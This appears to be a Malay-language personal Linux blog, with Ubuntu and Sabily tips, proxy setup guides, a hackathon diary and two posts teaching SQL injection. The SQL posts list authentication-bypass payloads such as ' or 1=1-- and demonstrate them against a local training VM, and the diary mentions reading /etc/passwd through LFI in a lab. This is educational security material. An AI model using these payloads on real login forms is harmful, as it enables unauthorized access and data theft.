Custom Search

Ahad, 22 November 2009

Ulasan: Ubuntu 9.10 Karmic Koala

Salam sejahtera kepada semua pengunjung Blog Sabily Untuk Malaysia,

Mungkin agak terlewat bagi saya untuk membuat sedikit ulasan dan berkongsi dengan anda semua tips-tips dan perisian yang saya cadangkan anda patut pasang di komputer anda.

Saya telah mencuba dua versi Ubuntu, Ubuntu Karmic dan Xubuntu Karmic. Malangnya banyak fungsi yang ada pada Gnome yang tidak ada dalam Xfce membuatkan saya hanya dapat bertahan selama seminggu sahaja dengan Xubuntu.

Xubuntu cukup berguna untuk komputer-komputer lama yang berprestasi rendah dan saya yakin mereka yang sukakan sistem operasi yang mempunyai fungsi ringkas akan menyukainya.

Saya memasang Ubuntu 9.10 pada komputer riba saya, Acer Aspire 4520.

Ubuntu menggunakan sistem fail Ext4 dan menggunakan GRUB2 untuk mengurus rekod boot. Saya dengar ramai yang merungut mengenai GRUB2 jika membuat dwi-boot atau tri-boot pada komputer mereka.

Sekiranya anda membuat dwi-boot, saya tak berapa galakkan anda untuk kemaskini melainkan anda menggunakan Ubuntu sebagai sistem operasi utama anda.

Perubahan yang saya dapat perhatikan pada Ubuntu Karmic:

- Network manager dengan Driver wireless yang lebih stabil. Tiada lagi masalah Network Manager. Wireless boleh diaktifkan dan dimatikan dengan butang wireless pada laptop macam di Windows.

- Tiada konflik peralatan wireless sekiranya anda menggunakan adapter wireless USB.

- Prestasi boot dan startup yang lebih pantas

- Proses pemasangan yang lebih mudah dengan slideshow semasa proses pemasangan.

- Simpanan data sebanyak 2GB percuma menggunakan akaun Launchpad dan Ubuntu One.

- Empathy menggantikan Pidgin. Tapi saya tak berapa suka dengan Empathy. Saya buang Empathy dan gantikan semula dengan Pidgin.

Jangan lupa untuk upgrade semua repositori dan perisian anda.

HostanyImage

Perisian yang saya cadangkan untuk anda semua pasang di Ubuntu Karmic:

HostanyImage


Ubuntu Tweak

Cara memasang.

Buka Terminal anda.

Taip

sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com FE85409EEAB40ECCB65740816AF0E1940624A220

Tekan enter.

Taip

sudo gedit /etc/apt/sources.list

tambahkan dua baris ayat berikut ke bahagian bawah sekali fail sources.list

deb http://ppa.launchpad.net/tualatrix/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/tualatrix/ppa/ubuntu karmic main

kemudian simpan dan tutup gedit.

Taipkan

sudo apt-get update
sudo apt-get install ubuntu-tweak

di Terminal anda.

Di Ubuntu tweak ni, ada macam-macam repositori yang berguna untuk anda. Saya akan terangkan dalam posting akan datang. Dan juga perisian-perisan lain.

Jangan lupa untuk pasang "ubuntu-restricted-extras" untuk memudahkan anda melakukan tugasan di Ubuntu.

Taip di Terminal.

sudo apt-get install ubuntu-restricted-extras


Sekian untuk posting kali ini.

P/S: Saya akan tambah lagi memandangkan sekarang musim cuti semester. Dah lama sangat tak kemaskini blog.

Jumaat, 28 Ogos 2009

Bunga api merdeka guna bash script

http://pastebay.com/43087

Simpan kod dalam format fail *.sh

Buka terminal

pergi ke direktori simpanan bunga-api.sh sebagai contoh

taip

chmod +x bunga-api.sh; ./bunga-api.sh

Selamat menyambut hari kebangsaan ke - 52.

Sabtu, 1 Ogos 2009

Tutorial: Guna Ultrasurf di Ubuntu dengan Crossover Office Professional

Penetapan CrossOver

1. Pergi ke Applications > CrossOver > Configuration


2. Lihat nama yang digunakan untuk default bottle anda di CrossOver. Dalam gambar di bawah adalah "newbottle".


3. Pergi ke folder default bottle crossover anda. Lokasi CrossOver saya di /home/ak47suk1/.cxoffice/newbottle



4. Disebabkan "newbottle" menggunakan Windows XP sebagai asasnya, saya salin dua fail di bawah iaitu mfc42.dll dan msvcp60.dll dari Windows XP asli. Elakkan untuk memindah turun kedua2 fail tersebut dari Internet.

Letakkan salinan kedua-dua fail tersebut di folder system dan system32 bottle anda. Sebagai contoh:

/home/ak47suk1/.cxoffice/newbottle/drive_c/windows/system/


/home/ak47suk1/.cxoffice/newbottle/drive_c/windows/system32/






Jalan Pintas Ke UltraSurf

Klik kanan pada Desktop, Pilih create launcher.

Masukkan arahan berikut ke ruang teks Command,

/opt/cxoffice/bin/wine /Lokasi Ultrasurf anda/u95.exe



Klik dua kali pada launcher tersebut.

Tunggu dalam 30 saat, Ultrasurf akan dijalankan.

Set 127.0.0.1 dan port 9666 pada setting Network firefox anda. Sila rujuk tutorial Tor sebelum ini.

Ahad, 14 Jun 2009

Silat SQL: Pengenalan dan Suntikan Asas Secara Umum Bahagian 2

Salam sejahtera semua,

Sebelum anda memulakan tutorial ini, sila dapatkan MyCERT-Training Virtual Machine terlebih dahulu. Anda boleh gunakan VMWare Server / VMWare Workstation untuk load VM ini.

File: MyCERT-Training.7z.001

Download Link: http://www.usaupload.net/d/dp06moc8r9e

File: MyCERT-Training.7z.002

Download Link: http://www.usaupload.net/d/k6dmpzymbcd

File: MyCERT-Training.7z.003

Download Link: http://www.usaupload.net/d/fy06bqfe5h1


File: MyCERT-Training.7z.004

Download Link: http://www.usaupload.net/d/tysno7knh40

md5 hash:

14e48737997597a3752ab1004771cb97 MyCERT-Training.7z.001
7b69585f8a098a78714d26c06a1c88de MyCERT-Training.7z.002
7a2e3472963eb36c6ded0b84cd5cdbb1 MyCERT-Training.7z.003
b393ee2c9415c35816966d2a661714a3 MyCERT-Training.7z.004

pass log masuk VM

username: training
password: analystanalyst

pass archive:

Analysis1 : Analysis1
Analysis2 : Analysis202
Bonus: Bonus303

==================================================================

1. Log masuk ke MyCERT Training VM.


pass log masuk VM

username: training
password: analystanalyst

2. Buka Firefox dan layari, http://localhost/training/sql/demo/index.php


3. Klik login, dan masukkan kata sql ' or 1=1 -- seperti dalam gambar.



4. Hasilnya. Hmmmm......


5. Cuba yang ini pula. 'or'1'='1





6. Hasilnya

Rabu, 3 Jun 2009

Catatan Hari Hackathon MSCOSCONF2009

Assalamualaikum dan Salam sejahtera,

Pada 31 Mei lepas, saya berkesempatan untuk menghadirkan diri ke Hari Hackathon MSCOSCONF2009. Saya akan berkongsi pengalaman saya dengan anda semua yang mengunjungi blog ini. :) Saya tulis dalam bentuk diari perjalanan untuk memudahkan pembacaan.

8.00 a.m.

Tiba di Berjaya Times Square bersama seorang rakan. Awal lagi. Lepak di Restoran belakang Sungei Wang Plaza untuk sarapan pagi.

9.00 a.m.

Jumpa rakan-rakan yang selama ini dikenali secara atas talian sahaja di forum-forum internet di Starbucks. Pergi bersama mereka untuk bersarapan pagi dan berbual-bual kosong.

9.45 a.m.

Daftar di kaunter. Ramai jugak orang. Setengah jam beratur, baru selesai. Kalau boleh daftar awal lagi kan bagus.

10.15 a.m.

Duduk di barisan antara yang paling belakang. Tak nampak sangat skrin LCD tu. Dengar jelah Encik Mahmud bentangkan serba sedikit mengenai ancaman siber dan intro mengenai peranan MyCERT.

Diperjelaskan penglibatan MyCERT dalam pelbagai organisasi seperti The Honeynet Project,PhishTank, Conficker Working Group dan agensi-agensi lain di dalam dan luar negara.

11.00 a.m.

Masa rehat sebentar sebelum masuk sesi hands-on. Jenguk-jenguk Install Fest Track. Tak ramai sangat orang, tidak seperti yang saya jangka. Mungkin kurang promosi atau sebab hari minggu atau ada urusan lain? Jenguk Booth Fedora, OpenSuse, OpenSolaris, Ubuntu (paling ramai, ada sesi macam mana nak install sotware dengan Synaptics Package Manager), akhir sekali Booth FreeBSD/PCBSD.

Bersembang dengan ahli komuniti FreeBSD/PCBSD dan saya bertanya mengenai FreeBSD/PCBSD dari segi GUI, nak install software dan lain-lain soalan yg biasa ditanya oleh seorang newbie FreeBSD.

Laa, Matthew Orlander ada kat sini rupanya. Terkesima jugaklah dapat berbual dengan core developer FreeBSD sendiri. Beliau cerita mengenai pengalaman beliau dalam FreeBSD sejak 70an dan ceritakan bagaimana FreeBSD yang menggunakan GNOME sebagai GUI, sehinggakan FreeBSD mendapat jolokan "poor man Macintosh". Saya diberitahu OSX banyak gak cilok idea dari FreeBSD. Hehehehe :D. Namapun sumber terbuka, sesiapa pun boleh guna, ye tak ;)

Perasan Trunasuci Arafat, tapi sebab tak berapa kenal beliau, segan pulak nak tegur.

Waktu rehat dah habis. Pergi balik ke Manhattan 3

11.20 a.m.

Sambungan sesi trek Cybersecurity. Pembentangan Masalah keselamatan Aplikasi web yang biasa dijumpai. Sekejap je slide tu sebab pihak Cybersecurity nak lebihkan kepada hands-on training. Ada masalah sedikit. Ramai yang tak ada VMWare server untuk load imej VM MyCERT Training. Saya adalah installer VMWare Workstation tapi versi Linux ;). Ramai yang keluar sama ada tak bawa notebook/netbook, tak install VMWare Server dan sebab-sebab lain.

Ada sahabat saya yang ada installer VMWare Server tapi versi Linux juga, ramai yang di dalam dewan pakai Windows. Akhirnya berlarutan sampai waktu rehat tengah hari dek nak install VMWare pada notebook mereka yang belum install dan mereka yang baru nak tahu bagaimana nak guna VMWare.

12.30 pm

Rehat makan tengah hari. Saya tengok semacam je tulang dan daging dalam sup tu. Kepala otak dah fikir benda yang tak sedap didengar. Tak nak takut syubhat, tengok apa yang di tulis kat kertas bawah bekas lauk tu. "Oxtail Soup". Ceh, bikin saspens je.

Dah saya tersebut di mulut, sampai di telinga seorang ahli komuniti Fedora Malaysia. Dia beritahu saya bahawa sikap berhati-hati tu memang perlu. Hmmmm.... betul juga.

Lepas makan, rehat-rehat.

2.00 pm

Hands-on training bermula. Sesi "Analysing Compromised Web Server:RFI". Tangan dah gatal nak menembak pelayan web tu dengan RFI. Ada masalah dengan skrip php yang sepatutnya vulnerable dengan RFI. dalam sibuk-sibuk nak betulkan skrip php tu, saya cuba-cuba LFI. LFI boleh pulak lepas. memang la, RFI dan LFI lubangnya sama tapi kaedahnya berbeza. sahabat sebelah saya pun tumpang sekaki, try juga baca /etc/passwd server tu. Sekali En. Mahmud perasan masa beliau tangah berpusing-pusing sekitar dewan tu. Orang suruh test RFI, dia test LFI =))

Masa hands-on ni ada buat ala CTF. Siapa yang dapat jumpa flag dahulu, dapat hadiah Pendrive Sliq 2GB dari Cybersecurity. Saya dan sahabat saya cuba, tapi kami silap sebut ada 6 fail dalam folder rfi/temp/. Tak perasan nama fail kedua tu ada jarak ruang kosong.

Seseorang jejaka bernama Adam tampil memberikan penyelesaian unik beliau. Beliau guna code injection x silap. Memang saya saspek, silap respek. Kalau Adam terbaca post ni, sila-silakanlah perkenalkan diri anda :D

3.45 pm

Rehat minum petang. Saya tak keluar. Takut meja 'dirampas'. :lol:

4.00 pm

Sesi "Analysing Compromised Web Server:SQL Injection". Pembentangan pertama adalah kaedah suntikan SQL asas untuk MySQL. Seperti mana yang saya jelaskan dalam Silat SQL: Pengenalan dan Suntikan Asas Secara Umum, cuma ada sedikit penambahan. Saya akan ceritakan lebih terperinci dalam artikel akan datang. Sesi hands-on untuk sesi ini bermula dengan cabaran untuk mendapatkan signature pengguna teratas di dalam pangkalan data Bank of MyCERT, aplikasi web vulnerable di dalam imej VM MyCERT Training.

Dalam masa tidak sampai seminit, saya terus angkat tangan. Alamak, tak perasan ke? Akhirnya bila ada orang lain yang angkat tangan baru En Hafiz perasan. Dapatlah juga cenderamata sebagai kenang-kenangan Hari Hackathon ni. Pendrive S.L.i.q 2 GB yang diberi kerana mennyahut cabaran SQLi (SQL injection). Dekat-dekat je bunyinya. Kebetulan ;)

Seterusnya, analisis 1, analisis 2 dan Bonus. Sahabat sebelah saya nak jawab soalan Bonus tu tapi tak sempat.

5.00 pm

Sesi "Analysing Compromised Web Server:Code Injection". Menggunakan vulnerable php di dalam VM MyCERT training.

5.45 pm

Tamat.

=============================================
Glosari

GUI - graphical user interface. Seperti biasa, rujuk sini http://en.wikipedia.org/wiki/GUI

RFI - Remote File Inclusion http://en.wikipedia.org/wiki/Remote_File_Inclusion

LFI - Local File Inclusion atau dikenali juga sebagai Include File Injection. http://en.wikipedia.org/wiki/Code_injection#Include_File_Injection

SQL - Structured Query Language http://en.wikipedia.org/wiki/SQL

VM - Virtual Machine

CTF - Capture The Flag.
=============================================

Kepada sesiapa yang berhajat.

File: MyCERT-Training.7z.001

Download Link: http://www.usaupload.net/d/dp06moc8r9e

File: MyCERT-Training.7z.002

Download Link: http://www.usaupload.net/d/k6dmpzymbcd

File: MyCERT-Training.7z.003

Download Link: http://www.usaupload.net/d/fy06bqfe5h1


File: MyCERT-Training.7z.004

Download Link: http://www.usaupload.net/d/tysno7knh40

md5 hash:

14e48737997597a3752ab1004771cb97 MyCERT-Training.7z.001
7b69585f8a098a78714d26c06a1c88de MyCERT-Training.7z.002
7a2e3472963eb36c6ded0b84cd5cdbb1 MyCERT-Training.7z.003
b393ee2c9415c35816966d2a661714a3 MyCERT-Training.7z.004

pass log masuk VM

username: training
password: analystanalyst

pass archive:

Analysis1 : Analysis1
Analysis2 : Analysis202
Bonus: Bonus303

Sambungan Silat SQL akan menggunakan Bank of Mycert yang terdapat di dalam MyCERT VM (http://localhost/training/sql/demo/index.php) sebagai contoh bagaimana kita boleh mengeksploitasi laman web yang terdapat lubang SQL dan melepasi (bypass) sistem pengesahan log masuk.

Ahad, 24 Mei 2009

Mengapa Saya Pilih Sabily? (Dikemaskini)

Assalamualaikum dan selamat sejahtera semua,

Sudah genap dua bulan rasanya saya menggunakan Sabily (Ubuntu Muslim Edition). Pelbagai masalah yang saya telah tempuh sepanjang dua purnama namun untuk berpatah balik ke Windows tidak sekali-kali.

Tidak adil rasanya untuk membandingkan sistem operasi propreitary dengan sistem operasi sumber terbuka, seperti membandingkan epal dengan oren. Namun begitu, Sabily tetap mempunyai pelbagai keistimewaan yang tidak ada pada sistem operasi propreitary seperti Windows.

Selain perisian yang sudah disertakan sekali dengan Ubuntu yang asal seperti OpenOffice.org,Scribus,Pidgin,Brasero,Rythmbox dan GIMP sebagai contoh, Sabily disertakan perisian Islamik seperti Zekr,Minbar,Hijri, Monajat dan Ensiklopedia Thwab.

Juga disertakan perisian pendidikan Gcompris, Brasero (tapi saya lebih suka K3b) untuk burn CD/DVD atau buat imej ISO,codec untuk audio/video, VLC Media Player, dan perisian Sistem Operasi Virtual, VirtualBox OSE yang membolehkan anda menjalankan sistem operasi Windows di dalam Sabily dan tidak lupa juga Compiz Fusion, efek desktop yang dicemburui oleh pengguna Windows :D.

Di sini saya sertakan beberapa screenshot untuk tatapan anda. Sila klik pada gambar utk gambar yg lebih jelas.

Zekr

Minbar Prayer Times

Pray Times! (Add-on Firefox)

Compiz Fusion

K3b

Rabu, 20 Mei 2009

Silat SQL: Pengenalan dan Suntikan Asas Secara Umum

Salam sejahtera semua,

Artikel kali ini akan membicarakan mengenai suntikan SQL. Kelemahan keselamatan laman sesawang berasaskan suntikan (injection flaw) mendapat tempat kedua sebagai kelemahan yang paling banyak ditemui di dalam aplikasi sesawang. [Sila rujuk http://www.owasp.org/index.php/Top_10_2007]. Oleh itu teknik suntikan SQL walaupun nampak remeh, namun hakikatnya berbisa.

Suntikan SQL asas

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

'or'1'='1

'or'a'='a

' or 1=1 #

1=1

"1'or'1'='1

1'or'1'='1

' or '1' = '1

admin'--

admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

'or"='


"My password is ' or 1=1--" adalah antara ungkapan yang menerangkan magic quote SQL untuk memintas halangan pengesahan log masuk sama ada pengguna biasa (user) atau pun pentadbir (admin). Daripada memasukkan nama pengguna dan katalauan yang sah, seorang penyerang akan menggunakan ungkapan SQL sebagai galang gantinya.

Contoh:

Nama Pengguna: ' or 1=1 --
Kata Laluan : ' or 1=1 --


Seorang penyerang mungkin dapat memintas pengesahan (authentication) pentadbir dan sekaligus dapat menjalankan tugasan sebagai seorang pentadbir sekiranya sistem log masuk tersebut menggunakan pangkalan data(database). Kelebihan sebagai pentadbir membolehkan seorang penyerang itu mengubah laman sesawang (website defacement), menebuk pintu belakang (planting backdoor), mahupun mencuri data sulit pengguna-pengguna di dalam sistem aplikasi web tersebut.


Mungkin anda semua akan membangkitkan persoalan kenapa dalam suntikan sql, untuk memintas log masuk kita akan gunakan string ' or 1=1--

Bila kita tengok semula, kemungkinan kenyataan yang digunakan untuk log masuk adalah :

SELECT Request.Form("pengguna") and Request.Form("katalaluan") FROM usertable


pemboleh ubah pengguna dan katalaluan digunakan untuk mengambil input yang dimasukkan oleh pengguna.

Dalam kenyataan di atas, sekiranya pengguna masukkan pengguna dan katalaluan yang betul, baru kenyataan tersebut akan dijalankan.

Para penggodam pula akan bermain-main dengan logik kat sini. Bila seseorang penggodam itu memasukkan ' or 1=1--, kenyataan di atas akan berubah menjadi:

SELECT ' or 1=1-- and ' or 1=1-- FROM usertable


tanda tick (') digunakan untuk break(pecahkan) kenyataan sql, tanda -- untuk komen yang bermaksud aplikasi sesawang tidak akan melaksanakan apa-apa kenyataan selepas tanda --.

or bermaksud atau, 1=1 bermaksud kita reka satu kenyataan yang benar, jadi, bila kenyataan sql ni jumpa 1=1 dia akan anggap benar. Sebab inilah yang membolehkan kita memintas log masuk. Kita boleh juga memasukkan 2=2, 3=3, yang penting kenyataan tersebut adalah benar.

Bila kita memintas log masuk dengan cara ni, kita akan dapat masuk dengan kelebihan (privillege) user yang paling atas dalam database. Selalunya pentadbir (admin).

Kenyataan di bawah ini lebih jelas untuk kita semua perhatikan:

SELECT 'id' and 'or '1'='1 and 'or '1'='1 FROM usertable

Bersambung ke Suntikan SQL Asas : MySQL 4 dan MySQL 5

Artikel ini merupakan sebahagian dari buku elektronik (e-book) "Silat SQL" yang merupakan rancangan penulis untuk menerbitkannya dan dilesenkan dengan Metasploit Framework License bagi mengelakkannya dieksploitasi secara komersil oleh pihak yang tidak bertanggungjawab dalam menghargai sumbangan komuniti
sumber terbuka.

Buku ini akan diedarkan secara percuma bagi menghargai konsep sumber terbuka dan falsafah ilmu yang merupakan hakmilik mutlak Yang Maha Mengetahui dan tidak wajar dihakciptakan oleh manusia.

Penulis mengucapkan jutaan terima kasih dan setinggi penghargaan kepada semua ahli HM Security Team terutama kepada Saudara ghimau yang menjadi antara sumber inspirasi penulis dalam dunia komuniti 'securityunderground', Crew,VVIP, VIP dan ahli-ahli biasa HMSecurity. Tidak lupa juga kepada komuniti sumber terbuka di seantero dunia.

Sebarang penyalahgunaan maklumat di dalam artikel ini adalah tanggungjawab mereka yang terlibat dan bukan merupakan tanggungjawab penulis.

Isnin, 18 Mei 2009

Muat turun Sabily 9.04

Sila gunakan Wuala Client untuk memudahkan anda memindah turun ISO sabily.

http:\\www.wuala.com

Sila cari berdasarkan keyword "sabily" atau tambah "jmehdi" sebagai kenalan anda di Wuala.

MSC Malaysia OSCONF 2009


The 2009 MSC Malaysia Open Source Conference
INVITATION TO PARTICIPATE IN MSC MALAYSIA OPEN SOURCE CONFERENCE 2009

Date: 31 May - 3 June, 2009
Venue: Berjaya Times Square Hotel & Convention Center, Kuala Lumpur.

MSC Malaysia's inaugural and full-fledged Open Source Conference to incorporate a "Quadruple play" of 4 crucial stakeholders consisting of government, businesses, developers and community in envisioning open source's contribution to the IT industry and socio-economy.

Positioned as International forum for sharing and exchanging ideas on technical advancements, applications, development and business cases on open source, and its positive impact in meeting challenges of the current economic climate.

Organised by MSC Malaysia in cooperation with the Malaysian Administrative Modernisation and Management Planning Unit (MAMPU), the annual MSC Malaysia OSCONF is also supported by the Malaysian Open Source community. This event complements the annual Malaysian Government Open Source Software Conference (MyGOSSCON) as the premier platform for all things Open Source in Malaysia.

With 3 DAYS, 3 TRACKS, 1 HACKATHON are in store for everyone who attend this conference. In addition, we have renowned speakers from prime Open Source Enterprises which are Mozilla, Google and Red Hat to name a few and also not forgeting from the developer community - Ubuntu, BSD, Fedora, PHPs, etc

Come join us at the MSC Malaysia Open Source Conference 2009! You'll be pleasantly surprised...
Who should attend?

* Business executives from MSC Malaysia and Non-MSC Malaysia Status companies
* Open Source developers, communities, inventors, evangelist, researchers, strategist
* Government officers
* Students, general public

Why you should attend?

1. Provide exposure and knowledge on the importance of Open Source in enhancing competitiveness by giving freedom of choice in software usage with lower total cost of ownership, hence benefiting businesses and society at large. Over 30 session tracks are made available.
2. Share amongst the open source community on new directions and latest innovations by the subject matter experts, thought leaders and industry gurus.
3. Provide a platform for conference participants to actively interact, share and exchange views, ideas, and tools on the latest trends and issues of Open Source.
4. Networking, learning and having great fun!

Assalamualaikum dan Selamat Sejahtera semua,

Mungkin ramai yang dah tahu, tapi tak apalah, saya ceritakan juga. Pada 31 Mei hingga 3 Jun ini akan diadakan Persidangan Sumber Terbuka 2009 MSC Malaysia yang julung-julung kalinya diadakan di Malaysia. Tempatnya adalah Berjaya Times Square Hotel & Conference Centre.

Ramai tokoh-tokoh dalam arena sumber terbuka global dan tempatan akan turut serta dalam persidangan ini dengan membentangkan kertas kerja atau menyampaikan syarahan mereka mengenai projek sumber terbuka di mana mereka terlibat.

Antara pembentang adalah:

Chris DiBona, Pengurus Program Sumber Terbuka Google. Antara tugas Chris adalah Google Summer of Code dan kod perisian sumber terbuka di http://code.google.com

Anthony Baxter dari Google Australia, Python guru.

Matthew Olander, ahli Pemasaran Projek FreeBSD.

Tak lupa juga pembangun dan otai sumber terbuka Malaysia, antaranya:

Redhuan D. Oon atau "Red1", ketua projek ADempiere ERP.

Amir Haris Ahmad pengasas zonestraits.com. Blog saya juga ada menggunakan domain di bawah projek zonestraits.com iaitu Blog KaibaTheLegacy, http:\\ak47suk1.via.my

Jangan mengaku penggodam Malaysia kalau Amir pun anda tak kenal. Pasal apa? Saya tak nak cerita di sini, anda semua carilah sendiri pasal sudut gelap sejarah Amir ni. Hehehe :D

Hackathon pada 31 Mei ni percuma. Datanglah beramai-ramai. Saya sendiri Insya-Allah jika tiada sebarang halangan akan pergi juga ke sana. Sebab tak pasti lagi tempat penginapan sepanjang 4 hari nanti. Nak kena pastikan dulu. :)

Konferens 3 hari juga harganya agak berpatutan bagi pelajar cuma RM50, jangan lupa bawa kad matrik. Kalau tak, kena cas penuh :lol:

Maklumat lanjut boleh tengok sini.

http://www.mscmalaysia.my/article/open+Source+Conference/OSCONF

Selasa, 12 Mei 2009

Guna Pidgin dengan Tor

Assalamualaikum dan Salam Sejahtera Semua,

Hari ini saya akan menunjukkan cara-cara untuk menggunakan Tor dengan Pidgin di Ubuntu.

Kenapa perlu gunakan Tor?

Sesetengah pejabat,sekolah,pusat pengajian tinggi atau mana-mana lokasi menghalang akses kepada Yahoo Messenger dengan ketetapan di firewall. Tor adalah satu perisian proksi yang dapat menembusi tembok halangan tersebut. Insya-Allah :)

Bagaimana untuk pasang Tor?

1.Tambahkan ppa berikut ke repositori anda (Repositori boleh diakses di System > Administration > Software Sources)

deb http://mirror.noreply.org/pub/tor jaunty main

2. Klik Close

3. Buka Terminal.

4. Taip arahan berikut di Terminal.

sudo su

gpg --keyserver keys.gnupg.net --recv 94C09C7F

gpg --fingerprint 94C09C7F

gpg --export 94C09C7F | sudo apt-key add -

apt-get update

apt-get install tor

5. Selepas selesai proses pemasangan, sila reboot pc anda.

6. Buka Pidgin Internet Messenger

7. Pergi ke Accounts > Manage Account

8. Klik pada akaun YM anda dan klik Modify



9. Klik tab Advanced

10. Klik drop-down menu Proxy Type dan pilih SOCKS 5


11. Setkan


Host: 127.0.0.1
Port:9050

12. Klik Save.

13. Hilang Tandakan Akaun YM anda di Accounts dan tandakan semula. Atau anda boleh restart Pidgin.

14. Mudah bukan?

Ahad, 3 Mei 2009

Panduan mudah kemaskini Ubuntu ME ke Sabily Jaunty

Salam semua,

Hari ini saya ingin berkongsi dengan anda bagaimana untuk mengemaskini Ubuntu Muslim Edition Intrepid ke Sabily Jaunty.

1. Pergi ke System > Administration > Update Manager

2. Klik Upgrade.

3. Ikut arahan yang diberikan.

4. Boot semula.

5. Pergi ke System > Administration > Software Sources.

6. Hidupkan Third Party Software yang dimatikan semasa proses kemaskini.

ATAU sekiranya anda ingin mengubah Ubuntu asal kepada Sabily Jaunty

7. Jalankan arahan ini di Terminal.

sudo wget http://www.sabily.org/sources.list.d/`lsb_release -cs`.list
--output-document=/etc/apt/sources.list.d/sabily.list;
sudo apt-get -q update;
sudo apt-get --yes -q --allow-unauthenticated install sabily-keyring;
sudo apt-get -q update

sudo aptitude install sabily


7. Jawab yes ketika diperlukan

Sabtu, 28 Mac 2009

Sesuaikah Perisian Sumber Terbuka untuk Pengguna Biasa?

Assalamualaikum dan Salam sejahtera semua,

Hari ini, saya bersembang dengan seorang sahabat saya yang merupakan peminat tegar (hardcore fan) Microsoft. Beliau mengemukakan beberapa hujah untuk
mempertahankan pendapat beliau yang Linux kurang sesuai untuk pengguna biasa. Antara hujah-hujah beliau ialah:

- Sistem Operasi Windows telah siap sedia dengan pembelian komputer baru (OEM).

- Tidak ramai vendor yang menyokong Linux.

- Linux tak boleh berdaya saing kerana ianya percuma.

- Pergantungan kepada syarikat monopoli tidak menyusahkan pengguna.

- Produk no 1 akan menjadi sasaran utama serangan siber. Kalau linux menjadi no 1, penulis virus akan menjadikan Linux sebagai sasaran baru.

Sebelum saya mulakan untuk memberi sanggahan kepada pendapat beliau ini, saya ingin tegaskan bahawa saya bukan ingin memaksa mana-mana pihak untuk bertukar
kepada Linux, tetapi sekadar memberi sedikit galakan dan sokongan kepada mereka yang mahu berhijrah.

Sistem Operasi Windows telah siap sedia dengan pembelian komputer baru (OEM)

Kita tidak boleh nafikan bahawa kebanyakan komputer di pasaran telah dipasang sistem operasi Windows. Linux kurang promosi berbanding dengan Windows. Kita sejak kecil, didedahkan dengan Windows. Cuba kalau kita didedahkan dengan Linux semasa kecil lagi, sudah tentu kita akan lebih cenderung kepada Linux.

Semakin ramai vendor komputer riba membekalkan komputer riba dengan Linux OS walaupun bukan yang mesra pengguna. Saya sendiri tidak faham kenapa mereka sukar untuk bekerjasama dengan Canonical untuk siap sediakan komputer riba keluaran mereka dengan Ubuntu.

Tidak ramai vendor yang menyokong Linux

IBM dan Sun antara syarikat yang menyokong Linux kerana mereka menjadikan Linux sebagai sistem operasi pada sistem pelayan mereka. Namun begitu, terdapat sambutan yang menggalakkan dari syarikat-syarikat dan badan korporat yang menggunakan Linux untuk menjimatkan kos operasi dalam keadaan ekonomi global ketika ini.

Linux tak boleh berdaya saing kerana ianya percuma

Memang Linux percuma. Sebagai contoh, Ubuntu dan Sabily(Ubuntu Muslim Edition). Pada pendapat saya, Linux kurang promosi. Sahabat saya juga mengakui pendapat ini dan merasakan Linux rugi kerana diberikan secara percuma.

Mungkin nampak macam syarikat di sebalik tabir Ubuntu ini rugi, namun begitu, ada peluang perniagaan yang tidak ramai yang nampak. Perniagaan khidmat sokongan (support). Syarikat - syarikat yang mempromosikan Ubuntu menggunakan perkhidmatan kepada pengguna Ubuntu sebagai sumber mata pencarian. Walaupun Windows mempunyai pelbagai masalah, terdapat banyak kedai komputer yang mahir menyelenggara komputer yang menggunakan Windows.

Banyak peluang perniagaan dalam komuniti sumber terbuka. Kafe siber menggunakan Ubuntu dan OpenOffice.org menjimatkan kos penyelenggaraan kerana tiada masalah virus dan menyokong format dokumen Microsoft. Kita juga boleh membuka kelas untuk belajar Linux, membina laman web dengan Joomla, PHP dan MySQL, grafik dengan GIMP, urusan pentadbiran dengan OpenOffice.org, kelas multimedia dengan Blender, Kino, Cinelerra dan lain-lain. Kalau dapat masuk tender untuk memasang dan menyelenggara sistem komputer sumber terbuka badan-badan kerajaan dan swasta apatah lagi, perniagaan yang menguntungkan.

Pergantungan kepada syarikat monopoli tidak menyusahkan pengguna.

Pakatan industri hardware dengan Microsoft bukan lagi rahsia. Kalau pengguna tidak perlukan hardware berkuasa tinggi untuk sistem operasi mereka, buat apa mereka beli pc baru? Dengan sumber terbuka, kuasa kembali ke tangan pengguna dan bukan lagi golongan yang menangguk di air keruh.

Produk no 1 akan menjadi sasaran utama serangan siber. Kalau linux menjadi no 1, penulis virus akan menjadikan Linux sebagai sasaran baru.


Apache adalah perisian web server yang popular tetapi statistik menunjukkan IIS lebih banyak diserang. Kenapa? Sebab kelemahan yang wujud dalam IIS hanya boleh ditampal oleh Microsoft dan tidak seperti Apache dimana pepijatnya boleh dihapuskan oleh sesiapa sahaja yang ada kemahiran dalam pengaturcaraan.

Kesimpulannya, perisian terbuka memang sesuai kepada semua termasuk pengguna biasa. Promosi terhadap perisian sumber terbuka haruslah dipergiat agar pengguna dapat merasai kebebasan terhadap penggunaan sistem operasi dan perisian mereka.

Selasa, 17 Mac 2009

NetworkManager - Kejap Ada, Kejap Tak Ada

Assalamualaikum dan selamat sejahtera semua,

Hari ini saya ingin memberitahu anda semua bagaimana untuk menyelesaikan masalah NetworkManager yg kadangkala sering tiba-tiba jadi macam biskut, kejap ada dan kejap tak ada.

Sila ikuti langkah-langkah berikut:

Klik Kanan di desktop dan klik Create Launcher...


Isikan tempat kosong seperti di dalam gambar.

Command : nm-applet --sm-disable
Name: Tak kisah apa pun.

Ikon Launcher NetworkManager ini akan terpampang di desktop. Klik dua kali pada ikon tersebut sekiranya ikon NetworManager tiba-tiba hilang dari panel.

Sabtu, 7 Mac 2009

Bagaimana hendak mematikan fungsi WebStrict Di Sabily?

Assalamualaikum dan Salam Sejahtera

Kali ini saya kongsikan serba-sedikit pengalaman saya semasa mula-mula menggunakan Sabily (dahulu dikenali sebagai Ubuntu Muslim Edition).

Apa itu WebStrict?
Menurut https://launchpad.net/webstrict , WebStrict adalah antaramuka pengguna (user interface) untuk DansGuardian, Perisian tapisan web.

Walau bagaimanapun, anda mungkin seperti saya yang kurang menyukai perisian tapisan ini kerana komputer tidak dikongsi. :)

Jom, kita mula sekarang.

1. Pergi ke System > Administration > Webstrict


2. Klik Stop. Lepas tu klik unlock.


3. Restart firefox jika sedang dijalankan di PC anda.

